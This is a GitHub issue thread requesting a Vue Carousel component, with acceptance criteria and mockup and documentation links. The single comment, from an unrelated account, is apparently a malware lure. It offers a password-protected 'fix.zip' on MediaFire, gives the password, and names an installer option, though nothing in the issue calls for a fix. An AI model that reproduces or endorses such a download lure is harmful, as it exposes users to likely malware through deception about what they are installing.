### ISSUE TITLE
Carousel component

### ISSUE THREAD

**Issue by leonid** [acronis/ui-component-library#81]
A carousel component is a user interface element that allows users to cycle through a series of content items, such as images, text, or other elements, typically in a sliding or fading manner.
It is often used to display featured content, image galleries, or product showcases. The carousel component usually includes navigation controls like next/previous buttons and indicators to show the current position within the sequence.  

## Acceptance

1. Define a Vue component named Carousel and CarouselItem.
2. Include props for customizable content such as items, autoplay, interval, loop, currentItem(valued or indexed).
3. Use slots to allow for flexible content insertion.
4. Implement methods to handle navigation (next, previous) and autoplay functionality.
5. Support triggers and keyboard interaction.
6. Apply styles to ensure the carousel is visually appealing and responsive.
7. Add demos with default state, several links and buttons
8. Test props, composition and rendered output
9. Update documentation

Optional:

1. Add stories
2. Add visual regression tests
3. Add performance tests

## Mockups

https://www.figma.com/design/6nFlVmwDwvGloglQHxyElh/Syntax-UI-3.0?node-id=515-3736

## Documentation

https://acronis.github.io/ui-component-library/components/carousel/carousel.doc.html

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
